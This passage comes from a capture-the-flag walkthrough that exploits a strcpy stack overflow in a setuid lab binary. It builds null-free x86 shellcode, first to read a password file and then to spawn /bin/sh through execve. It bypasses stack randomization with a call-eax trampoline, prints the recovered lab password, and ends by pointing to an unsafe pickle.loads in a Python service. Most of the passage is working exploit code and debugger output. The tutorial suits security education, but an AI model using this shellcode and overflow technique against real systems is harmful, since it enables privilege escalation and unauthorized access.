| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | | |
| +------------+------------+ |
+-------->| 0xffa3ede0 | | <-+
+------------+------------+
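The addresses in these diagrams all follow from the three preamble instructions. Here is a small Python sketch of that arithmetic, using the example values from the diagrams (the variable names are mine, not anything from the binary):

```python
# Example values taken from the diagrams above; names are illustrative only.
RET_ADDR_SLOT = 0xffa3f1fc   # where `call fun` pushed the return address

ebp = RET_ADDR_SLOT - 4      # push ebp; mov ebp, esp -> saved ebp sits just below
esp = ebp - 0x418            # sub esp, 0x418         -> 1048-byte frame
buf = ebp - 0x408            # lea eax, [ebp-0x408]   -> start of buf

# Number of bytes between the start of buf and the saved return address.
offset_to_ret = RET_ADDR_SLOT - buf

print(hex(ebp), hex(esp), hex(buf), offset_to_ret)
# prints: 0xffa3f1f8 0xffa3ede0 0xffa3edf0 1036
```

The last number is the one that matters for the overflow: anything written past 1036 bytes from the start of buf lands on the return address.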
Let's look at how that strcpy
call works. First, we push on the address of
the str
parameter with:
mov eax,DWORD PTR [ebp+0x8]
mov DWORD PTR [esp+0x4],eax
Now our stack looks like this:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3ede0 | | <-+
+------------+------------+
Now, we calculate the start address of buf
, and put it on the top of the stack:
lea eax,[ebp-0x408]
mov DWORD PTR [esp],eax
Directly before and directly after the call to strcpy
, our stack looks like
this:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3ede0 | 0xffa3edf0 |----> beginning of `buf` <-+
+------------+------------+
Let's see what happens after the call. The leave
instruction is basically just
sugar for the two instructions mov esp, ebp
and pop ebp
. This is what the stack
looks like afterwards:
esp ebp Address Value
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
+------------+------------+
With one instruction, we're back to our original picture. Neat. Now all that's left
is the ret
instruction, which simply pops the last value off the stack, and jumps
to it. After ret
, execution will continue at the address 0x080484dc.
Ok whew, all that was just to make sure we have our mental model straight for
the real work ahead. Notice that the return location is stored extremely close to
buf, and there's nothing stopping us from overwriting it. Putting together the
pieces, we want to inject the malicious string of assembly we constructed earlier
into memory somewhere, and overwrite the return address from fun to point to it.
We also need to include the actual cat command that we're going to pass to the
system function call. Here's one way to lay out our buffer:
The command:
cat /etc/level05/.password ; #
|------------30--------------|
The function call:
\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0
|--------------------12------------------------|
The padding:
<any character that isn't \0>
|----------994--------------|
The overwritten return address:
\x??\x??\x??\x??
|------4-------|
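The 994 is not arbitrary. It is whatever is left between the start of buf and the return address once the command and the code are in place. A quick Python sketch of that calculation, assuming the frame layout from the diagrams (buf at ebp-0x408, then the 4-byte saved ebp):

```python
BUF_OFFSET_FROM_EBP = 0x408   # buf starts at ebp-0x408
SAVED_EBP_SIZE = 4            # the saved ebp sits between buf's frame and the return address
RET_ADDR_SIZE = 4

command = b"cat /etc/level05/.password ; #"
code = bytes.fromhex("68bc23c3ffb87c840408ffd0")

# Everything before the return address must add up to this many bytes.
bytes_before_ret = BUF_OFFSET_FROM_EBP + SAVED_EBP_SIZE
padding_len = bytes_before_ret - len(command) - len(code)
total_len = bytes_before_ret + RET_ADDR_SIZE

print(len(command), len(code), padding_len, total_len)
# prints: 30 12 994 1040
```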
The padding is the magic that gets everything going. It should push the address
we'll be crafting in a moment into the slot that holds the return address from fun.
Let's try it with 0x12345678 for our return address. We'll get a segfault, but we'll
know we're on the right track. I'm going to make a Ruby file, make_payload.rb, to
make the actual payload:
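command = "cat /etc/level05/.password ; #" # 30 bytes
code = "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0" # 12 bytes of machine code
padding = 'a' * 994 # Filler up to the saved return address
addr = "\x78\x56\x34\x12" # 0x12345678, little-endian
File.open("payload", "wb") { |f| f.write(command + code + padding + addr) } # "wb" writes the bytes untouched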
Once we run it, we should have what we want in payload
. Alright, let's see
what happens when we use that as input to the program:
$ gdb /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble fun
Dump of assembler code for function fun:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x418
0x0804848d <+9>: mov eax,DWORD PTR [ebp+0x8]
0x08048490 <+12>: mov DWORD PTR [esp+0x4],eax
0x08048494 <+16>: lea eax,[ebp-0x408]
0x0804849a <+22>: mov DWORD PTR [esp],eax
0x0804849d <+25>: call 0x8048388 <strcpy@plt>
0x080484a2 <+30>: leave
0x080484a3 <+31>: ret
End of assembler dump.
(gdb) break *0x080484a2
Breakpoint 1 at 0x80484a2
(gdb) run "`cat payload`"
Starting program: /levels/level04 "`cat payload`"
Breakpoint 1, 0x080484a2 in fun ()
(gdb) x/1xw $ebp+4
0xff86e98c: 0x12345678
Well look at that! There's our injected address right where we wanted it! Now,
let's start making some numbers real. Ok, let's find the address of system
,
because our payload needs that:
(gdb) print system
No symbol table is loaded. Use the "file" command.
Hmmm, ok, so gdb doesn't work very well without debug symbols. Surely we can find it with nm:
$ nm /levels/level04 | grep system
$
So here's the thing: that symbol doesn't exist in our binary at all. The program
never calls system, so there was no reason to link it in! Clearly we need a new
approach. One option would be to find another function that is linked in that
could be made to print the contents of a file. In terms of libc functions, we have
exit, printf, puts, and strcpy. Ok, so if we read in the contents of
/home/level05/.password, then we can probably figure out how to print it out with
printf or puts. But how do we read the file? We don't have the read symbol, so we
seem to be back at square one.
At this point, we need to understand what those magical libc functions actually
do. Long story short, functions like system and read end up calling Linux system
calls, and to make a long story even shorter, we can do that ourselves by using
the 0x80 interrupt vector. It works like this: you put the number of the system
call into eax and the arguments to the call into ebx, ecx, and edx, then you
execute int 0x80, and the kernel takes over. You can find the list of supported
syscalls with their numbers in /usr/include/asm/unistd_32.h, and you can find
their signatures in man 2 <syscall>. Note that there is no system syscall. I
suspect the system function eventually calls execve after doing some parameter
parsing.
I'm sure we could figure out how to use execve
to run our cat
command, but
I think there's a better way. The cat
command with a single argument merely
reads the file named by that argument into memory, and writes it out to standard
out. This can be done with three syscalls: open
to get a descriptor for a file
by name, read
to read from that descriptor into memory, and write
to write
to the (already open) descriptor for standard out. Let's write some code for
this! First, we'll make a full version that runs as a standalone program, so we
can test that it works:
SECTION .bss
BufLen equ 16
Buf resb BufLen
SECTION .data
FileName db "blah", 0x0
SECTION .text
global _start ; Entry point for ld
_start:
mov eax, 5 ; `open` syscall
mov ebx, FileName ; Open FileName
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, Buf ; Read into Buf
mov edx, BufLen ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, Buf ; Write from Buf
mov edx, BufLen ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
Now you should be able to "cat" a file named "blah":
$ nasm -f elf32 -g -o level04.o level04.asm
$ ld -o level04 level04.o
$ echo "blah" > blah
$ ./level04
blah
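For comparison, the same open/read/write sequence can be sketched in Python, whose os module exposes thin wrappers around these system calls. This is only an illustration of the three steps: the function name cat_prefix and the temporary demo file are my own, and unlike the assembly it closes the descriptor and writes only the bytes it actually read.

```python
import os
import tempfile

def cat_prefix(path, length=16):
    """Copy up to `length` bytes of `path` to stdout using raw descriptors."""
    fd = os.open(path, os.O_RDONLY)   # open  (eax = 5 in the assembly)
    try:
        data = os.read(fd, length)    # read  (eax = 3)
    finally:
        os.close(fd)                  # the assembly skips this and simply exits
    os.write(1, data)                 # write (eax = 4) to descriptor 1, stdout
    return data

# Demo on a throwaway file named "blah", mirroring the shell session above.
with tempfile.TemporaryDirectory() as tmp:
    demo_path = os.path.join(tmp, "blah")
    with open(demo_path, "w") as f:
        f.write("blah\n")
    demo_output = cat_prefix(demo_path)
```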
Ok good, but now we need to make this more suitable for injection. We won't have
the luxury of running in the .text
section or referencing any symbols at all.
We'll be running purely from within a chunk of memory in .bss
. Let's see if
we can mimic this setup and keep our program working:
SECTION .data
mov esi, 0x8049088 ; Keep track of location of our code
mov eax, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 91 ; Code takes 75 bytes, buffer takes 16
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, esi
add ecx, 75 ; 75 bytes of code, then buffer starts
mov edx, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, esi
add ecx, 75 ; Write from Buf
mov edx, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
db "blah", 0x0
SECTION .text
global _start ; Entry point for ld
_start:
jmp 0x8049088
Note that the chunk of code in .data
is fully self-contained. If we manage to
jump to it, and if it actually lives at 0x8049088, it will print the contents of
the blah
file. Good, let's turn this runnable program into the 1040-byte string
payload we need to overflow our buffer the way we want. We'll replace the string
"blah" with "/home/level05/.password" to get the real file we want, remove all
the support code, add a word at the end with the address of our code, and pad
before it with no-ops to get the right length. We also need to add BITS 32
in
anticipation of building a flat binary, which defaults to 16-bit mode:
BITS 32
mov esi, 0x8049088 ; Keep track of location of our code
mov eax, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 91 ; Code takes 75 bytes, buffer takes 16
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, esi
add ecx, 75 ; 75 bytes of code, then buffer starts
mov edx, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, esi
add ecx, 75 ; Write from Buf
mov edx, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
db "/home/level05/.password", 0x0
times 921 nop
dd 0x8049088
Now we generate a flat binary and make sure it's the right size:
$ nasm -f bin -o level04.o level04.asm
$ wc -c level04.o
1040 level04.o
There's a minorly interesting problem here. We can't use scp to get our payload
over to the ctf machine. There are a number of ways to work around this, but I
ended up copying the hex version of it from the output of the xxd
command locally,
and pasting it as input to xxd
remotely:
$ xxd -p level04.o | pbcopy # Local
$ echo "66be88..." > payload.hex # Remote
$ xxd -p -r < payload.hex > payload
$ wc -c payload
1040
Ok, we still don't expect this to work, but we're getting closer. Let's run it and see what things look like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/32xb $ebp-0x408
0xffd662f0: 0x66 0xbe 0x88 0x90 0x04 0x08 0x66 0xb8
0xffd662f8: 0x05 0x66 0x89 0xf3 0x66 0x83 0xc3 0x5b
0xffd66300: 0x66 0xb9 0xcd 0x80 0x66 0x89 0xc3 0x66
0xffd66308: 0xb8 0x03 0x66 0x89 0xf1 0x66 0x83 0xc1
Hmm, our bytes look sorta right, but not quite. Let's look more closely at the beginning of the hexdump:
0000000: 66 be 88 90 04 08 66 b8 f.....f.
0000008: 05 00 00 00 66 89 f3 66 ....f..f
0000010: 83 c3 5b 66 b9 00 00 00 ..[f....
0000018: 00 cd 80 66 89 c3 66 b8 ...f..f.
Ah, it looks good through 66 b8 05, but then the next byte is 66, when it should
be 00 three times! Our null bytes have gone missing. The shell drops them when it
expands `cat payload` into an argument, and strcpy would have stopped copying at
the first one anyway. How annoying. We need to write a new version of our payload
with null bytes carefully avoided. Here goes:
BITS 32
mov esi, 0x08049088 ; Keep track of location of our code
mov al, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 67 ; Code takes 51 bytes, buffer takes 16
xor ecx, ecx ; Read-only
mov BYTE [esi+90], cl ; Need 0x0 as last byte in filename for open call
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov al, 3 ; `read` syscall
mov ecx, esi
add ecx, 51 ; 51 bytes of code, then buffer starts
mov dl, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov al, 4 ; `sys_write` syscall
mov bl, 1 ; Use stdout
mov ecx, esi
add ecx, 51 ; Write from Buf
mov dl, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
db 0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1
db "/home/level05/.password", 0x1
times 945 nop
dd 0x08049088
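A check like the following can confirm that a payload is free of null bytes before it gets transferred. It is a Python sketch with a helper name of my own choosing, and the two byte strings are the standard encodings of the old and new forms of the first syscall setup:

```python
def nul_offsets(data):
    """Return the offsets of every 0x00 byte in data."""
    return [i for i, b in enumerate(data) if b == 0]

mov_eax_5 = bytes.fromhex("b805000000")  # mov eax, 5: opcode plus a 4-byte immediate
mov_al_5 = bytes.fromhex("b005")         # mov al, 5:  opcode plus a 1-byte immediate

print(nul_offsets(mov_eax_5))  # prints: [2, 3, 4]
print(nul_offsets(mov_al_5))   # prints: []
```

Running the same function over the whole assembled file (for example the bytes of level04.o) should return an empty list once every null has been removed.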
A lot of our null bytes were coming from moving 4-byte values that were actually
only 1-byte values, thus leaving the top 3 bytes as 0. The rest were coming from
data initialization. In the case of the buffer, it doesn't matter what it is
initially since we never use the initialized values, but in the case of the file
name, we have to set its last byte back to 0 before passing it to the open call
or it won't find the proper end of our string. Of course, after changing instructions
we had to recalculate all the offsets and add some more nops. After transferring
the binary, let's see what it looks like now:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/8i $ebp - 0x408
0xffbca040: mov esi,0x08049088
0xffbca046: mov al,0x5
0xffbca048: mov ebx,esi
0xffbca04b: add ebx,0x43
0xffbca04f: xor ecx,ecx
0xffbca052: mov BYTE PTR [esi+0x5a],cl
0xffbca056: int 0x80
(gdb) x/w $ebp + 4
0xffbca44c: 0x08049088
Looks great! We still need to make our absolute addresses point to the right thing
though! They should point right to the beginning of the buffer, which is at
ebp-0x408, so let's grab that value:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) print $ebp-0x408
$1 = (void *) 0xffbca040
Open up a hex editor and modify the values:
$ xxd payload > payload.hex
# Replace 8890 0408 with 40a0 bcff
$ xxd -r payload.hex > payload
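The same patch can be scripted instead of done by hand. Here is a Python sketch, assuming the payload bytes are already in memory. The helper name is hypothetical, and it replaces every occurrence of the old address, which is what we want here since it appears both in the first instruction and in the return slot:

```python
import struct

def patch_address(payload, old, new):
    """Swap every little-endian 32-bit occurrence of `old` for `new`."""
    old_bytes = struct.pack("<I", old)   # 0x08049088 -> 88 90 04 08
    new_bytes = struct.pack("<I", new)   # 0xffbca040 -> 40 a0 bc ff
    return payload.replace(old_bytes, new_bytes)

# Tiny stand-in for the real payload: mov esi, imm32 ... nops ... return address.
sample = b"\xbe" + struct.pack("<I", 0x08049088) + b"\x90" * 4 + struct.pack("<I", 0x08049088)
patched = patch_address(sample, 0x08049088, 0xffbca040)

print(patched.hex())
# prints: be40a0bcff9090909040a0bcff
```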
Now let's see what it looks like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/w $ebp+4
0xffab302c: 0xffbca040
Nice, we got our location into the return address! Let's make sure it still points to the beginning of the buffer like we want:
(gdb) print $ebp-0x408
$4 = (void *) 0xffab2c20
D'oh! Our address moved. What happened is stack randomization. To make exactly
the type of thing we're trying to do harder, many modern systems root their stacks
at a random place in memory. It makes it significantly more difficult to hard-code
jumps into code you've injected onto the stack. So what do we do now? Well, one
common technique is to pick a value and try over and over again until that value
happens to be correct. This can be improved on by putting the filler nops at the
beginning of the payload instead of the end, creating a "nop slide": the payload
will work regardless of which instruction in the nop slide the jump lands on.
This helps a reasonable amount and would almost certainly work with as many nops
as we have, but we can actually use a far more clever technique to remove the
non-determinism entirely. Note that after the call to strcpy, we still have
the address of our buffer in eax:
(gdb) print/x $ebp-0x408
$10 = 0xffab2c20
(gdb) print/x $eax
$11 = 0xffab2c20
We have two occurrences of the absolute address that we need to get rid of. If
we can assume that the address is in eax when our code begins, the first occurrence
is easy. We just need to change our first instruction to mov esi, eax
. The
second occurrence is the clever part - if we can find a jmp eax
or call eax
instruction somewhere in the binary at an absolute address, we can use that as
our absolute address to return to, and it will then call into our buffer! So
let's go sleuthing, starting with the symbols defined in the .text
section,
which we know contain code:
$ objdump -t /levels/level04 | grep .text
080483d0 l d .text 00000000 .text
08048400 l F .text 00000000 __do_global_dtors_aux
08048460 l F .text 00000000 frame_dummy
08048560 l F .text 00000000 __do_global_ctors_aux
080484f0 g F .text 00000005 __libc_csu_fini
080483d0 g F .text 00000000 _start
08048484 g F .text 00000020 fun
08048500 g F .text 0000005a __libc_csu_init
0804855a g F .text 00000000 .hidden __i686.get_pc_thunk.bx
080484a4 g F .text 0000004b main
(gdb) disassemble __do_global_dtors_aux
# ... Nothing useful
(gdb) disassemble frame_dummy
Dump of assembler code for function frame_dummy:
0x08048460 <+0>: push ebp
0x08048461 <+1>: mov ebp,esp
0x08048463 <+3>: sub esp,0x18
0x08048466 <+6>: mov eax,ds:0x8049f1c
0x0804846b <+11>: test eax,eax
0x0804846d <+13>: je 0x8048481 <frame_dummy+33>
0x0804846f <+15>: mov eax,0x0
0x08048474 <+20>: test eax,eax
0x08048476 <+22>: je 0x8048481 <frame_dummy+33>
0x08048478 <+24>: mov DWORD PTR [esp],0x8049f1c
0x0804847f <+31>: call eax
0x08048481 <+33>: leave
0x08048482 <+34>: ret
0x08048483 <+35>: nop
End of assembler dump.
Look at that! Right there at 0x0804847f is the call eax
we need. Alright, let's
modify our payload one more time:
BITS 32
mov esi, eax ; Keep track of location of our code
xor eax, eax ; Clear eax
mov al, 5 ; `open` syscall
mov ebx, esi ; Calculate FileName address offset from beginning of code
add ebx, 52+16 ; Code takes 52 bytes, buffer takes 16
xor ecx, ecx ; Read-only
mov BYTE [esi+52+16+22+1], cl ; Need 0x0 as last byte in filename for open call. Code takes 52, buffer 16, filename 23 (22+1)
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov al, 3 ; `read` syscall
mov ecx, esi ; Calculate buffer address from beginning of code
add ecx, 52 ; 52 bytes of code, then buffer starts
mov dl, 16 ; Read 16 bytes
int 0x80 ; Make syscall
mov al, 4 ; `sys_write` syscall
mov bl, 1 ; Use stdout
mov ecx, esi ; Calculate buffer address from beginning of code
add ecx, 52 ; Write from buffer
xor edx, edx ; Make sure edx is empty
mov dl, 16 ; Write 16 bytes
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
times 16 db 0x1
db "/home/level05/.password", 0x1
times 944 nop
dd 0x0804847f
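The hard-coded offsets in this listing are easy to get wrong, so here is the arithmetic as a Python sketch. The 52-byte code size is my own count of the instruction encodings and should be treated as an assumption to confirm against the assembler's output:

```python
CODE_SIZE = 52                          # assumed size of the instructions, in bytes
BUF_SIZE = 16                           # scratch buffer: times 16 db 0x1
FILENAME = b"/home/level05/.password"   # 23 bytes, followed by a 0x1 placeholder
BYTES_BEFORE_RET = 0x408 + 4            # buf up to the saved return address

buf_offset = CODE_SIZE                                # add ecx, 52
filename_offset = CODE_SIZE + BUF_SIZE                # add ebx, 52+16
terminator_offset = filename_offset + len(FILENAME)   # [esi+52+16+22+1]
nops = BYTES_BEFORE_RET - (terminator_offset + 1)     # times 944 nop
total = BYTES_BEFORE_RET + 4                          # plus dd 0x0804847f

print(buf_offset, filename_offset, terminator_offset, nops, total)
# prints: 52 68 91 944 1040
```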
Alright, let's try it out!
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/xw $ebp+4
0xffaf11ec: 0x0804847f
(gdb) x/i 0x0804847f
0x804847f <frame_dummy+31>: call eax
(gdb) print/x $eax
$1 = 0xffaf0de0
(gdb) print/x $ebp-0x408
$2 = 0xffaf0de0
(gdb) disp/i $eip
1: x/i $eip
=> 0x80484a2 <fun+30>: leave
(gdb) stepi
0x080484a3 in fun ()
1: x/i $eip
=> 0x80484a3 <fun+31>: ret
(gdb)
Cannot access memory at address 0x90909094
(gdb)
Cannot access memory at address 0x90909094
(gdb)
0xffaf0de2 in ?? ()
1: x/i $eip
=> 0xffaf0de2: xor eax,eax
(gdb) stepi
0xffaf0de4 in ?? ()
1: x/i $eip
=> 0xffaf0de4: mov al,0x5
(gdb)
0xffaf0de6 in ?? ()
1: x/i $eip
=> 0xffaf0de6: mov ebx,esi
(gdb)
0xffaf0de8 in ?? ()
1: x/i $eip
=> 0xffaf0de8: add ebx,0x44
(gdb)
0xffaf0deb in ?? ()
1: x/i $eip
=> 0xffaf0deb: xor ecx,ecx
(gdb)
0xffaf0ded in ?? ()
1: x/i $eip
=> 0xffaf0ded: mov BYTE PTR [esi+0x5b],cl
(gdb)
0xffaf0df0 in ?? ()
1: x/i $eip
=> 0xffaf0df0: int 0x80
(gdb)
0xffaf0df2 in ?? ()
1: x/i $eip
=> 0xffaf0df2: mov ebx,eax
(gdb) print $eax
$3 = -13
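The -13 left in eax is how the kernel reports a failed syscall: a negated errno value. A quick lookup, sketched in Python:

```python
import errno
import os

syscall_result = -13          # value gdb showed in eax after int 0x80
code = -syscall_result        # the kernel returns -errno on failure

print(errno.errorcode[code], "-", os.strerror(code))
```

On Linux, errno 13 is EACCES, i.e. permission denied.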
That was great! It jumped into and ran our code! We got an error from our open
call, but that is to be expected - recall that the setuid mechanism doesn't work
when running under gdb. At this point we just need to cross our fingers and run
it!
$ /levels/level04 "`cat payload`"
WNWfdC5eWkIM
Ta-da! The level05
user has password "WNWfdC5eWkIM".
We wrote some very specific exploit code for the use case of reading out a file
with a known name, but we may not always know exactly what we want to do with
our heightened permissions. Because of this, the most common exploit is to run
a brand new shell instance, which will inherit the heightened permissions. This
looks more similar to our previous exploit using system in that we want to
execute a program by name. Instead of cat, we want to execute the shell found
at /bin/sh. Recall that I speculated that system probably eventually calls
the execve syscall. We're going to call it directly. The execve call is number
11, and its signature is:
int execve(const char *filename, char *const argv[], char *const envp[])
The filename parameter is a pointer to a null-terminated string, argv is a
pointer to a null-terminated array of pointers to the string arguments to the
program, the first of which is conventionally the name of the file, and envp is
the environment the program should execute under. For filename we need to pass a
pointer to the string /bin/sh, which we can do with the same technique we used for
the file name in our previous payload. We don't need to send any arguments to the
program, but we do need to get the filename in as the first element of argv. We'll
already have a pointer to the filename, so we can just store it in memory and pass
a pointer to that pointer for argv. We can safely point to a blank array for envp -
a blank array of pointers is just a single null pointer, which we'll already have
at the end of argv, so we'll just re-use that. I won't go into too much detail on
the final result, but most of it should make sense after working through our
previous exploit:
BITS 32
_code:
mov esi, eax ; Keep track of location of our code
xor eax, eax ; Clear eax
mov al, 11 ; `execve` syscall
lea ebx, [esi+ToFileName] ; ebx gets pointer to filename string
xor ecx, ecx ; Clear ecx so it can be used to clear some memory
mov BYTE [esi+ToFileNameEnd], cl; Clear the byte at the end of FileName to make it a valid char*
lea edx, [esi+ToArgVEnd] ; edx gets the address of the NULL word at the end of argv, representing an empty char*[] for envp
mov DWORD [edx], ecx ; Clear the word at the end of ArgV to make it a valid char*[]
lea ecx, [esi+ToArgV] ; ecx gets the address of argv
mov [ecx], ebx ; Make the first element of argv point to filename
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
ToFileName equ $-_code ; The distance to the FileName storage
FileName db "/bin/sh"
ToFileNameEnd equ $-_code ; The distance to the NULL byte ending filename
FileNameEnd db 0x1
ToArgV equ $-_code ; The distance to the beginning of argv
FileNamePtr dd 0x01010101
ToArgVEnd equ $-_code ; The distance to the NULL word ending argv and envp
ArgVEnd dd 0x01010101
CodeSize equ $-_code ; Size of code, so that we can calculate how many nops we need
times 1036-CodeSize nop ; Pad with nops to make the length 1036
dd 0x0804847f ; Address of instruction of `call eax` or `jmp eax`
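To make the pointer juggling concrete, here is a Python sketch of what the data area after the code should look like once the shellcode has patched it at runtime, and what ends up in the three argument registers. The base address is the buffer address from the earlier gdb session, and the 32-byte code size is my own count of the instructions. Both are assumptions for illustration only.

```python
import struct

FILENAME = b"/bin/sh"

def execve_layout(base, code_size):
    """Mirror the ToFileName/ToArgV/ToArgVEnd offsets and the runtime patches."""
    to_filename = code_size
    to_filename_end = to_filename + len(FILENAME)
    to_argv = to_filename_end + 1
    to_argv_end = to_argv + 4
    data = (
        FILENAME
        + b"\x00"                                 # mov BYTE [esi+ToFileNameEnd], cl
        + struct.pack("<I", base + to_filename)   # mov [ecx], ebx    -> argv[0]
        + struct.pack("<I", 0)                    # mov DWORD [edx], ecx -> argv[1] and envp[0]
    )
    return {
        "ebx": base + to_filename,   # filename
        "ecx": base + to_argv,       # argv
        "edx": base + to_argv_end,   # envp
        "data": data,
    }

layout = execve_layout(base=0xffaf0de0, code_size=32)
print(hex(layout["ebx"]), hex(layout["ecx"]), hex(layout["edx"]), layout["data"].hex())
```

Note that envp points at the same null word that terminates argv, which is the re-use described above.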
Aaaand, it works!
$ /levels/level04 "`cat payload`"
$ whoami
level05
$ cat /home/level05/.password
WNWfdC5eWkIM
This approach is much more flexible - we can probably re-use it in other circumstances and only need to change the number of no-ops and the address at the end.
Log in as level05 with WNWfdC5eWkIM as the password.
The deal is that the level06
user is running an uppercaser service, which is
accessible through HTTP on port 9020. Let's take a look:
$ curl 127.0.0.1:9020 -d 'hello friend'
{
"processing_time": 1.0967254638671875e-05,
"queue_time": 0.6934969425201416,
"result": "HELLO FRIEND"
}
Not too much to go on here, but it's definitely interesting that we are getting
timing information. Could be that we can formulate an attack that uses the timing
information to leak something important to us. This is the first level that uses
Python, with the code living directly in the setuid executable /levels/level05.
It's too long to copy here, so we'll just pick and choose the interesting parts
as we go.
From an exploitation perspective, there are two major red flags, which we'll be exploiting, both of which live in a single method:
def deserialize(serialized):
    logger.debug('Deserializing: %r' % serialized)
    parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
    match = parser.match(serialized)
    direction = match.group(1)
    data = match.group(2)
    job = pickle.loads(match.group(3))
    return direction, data, job
The first thing that jumps out is the known-exploitable pickle
library. Its
documentation features a prominent warning:
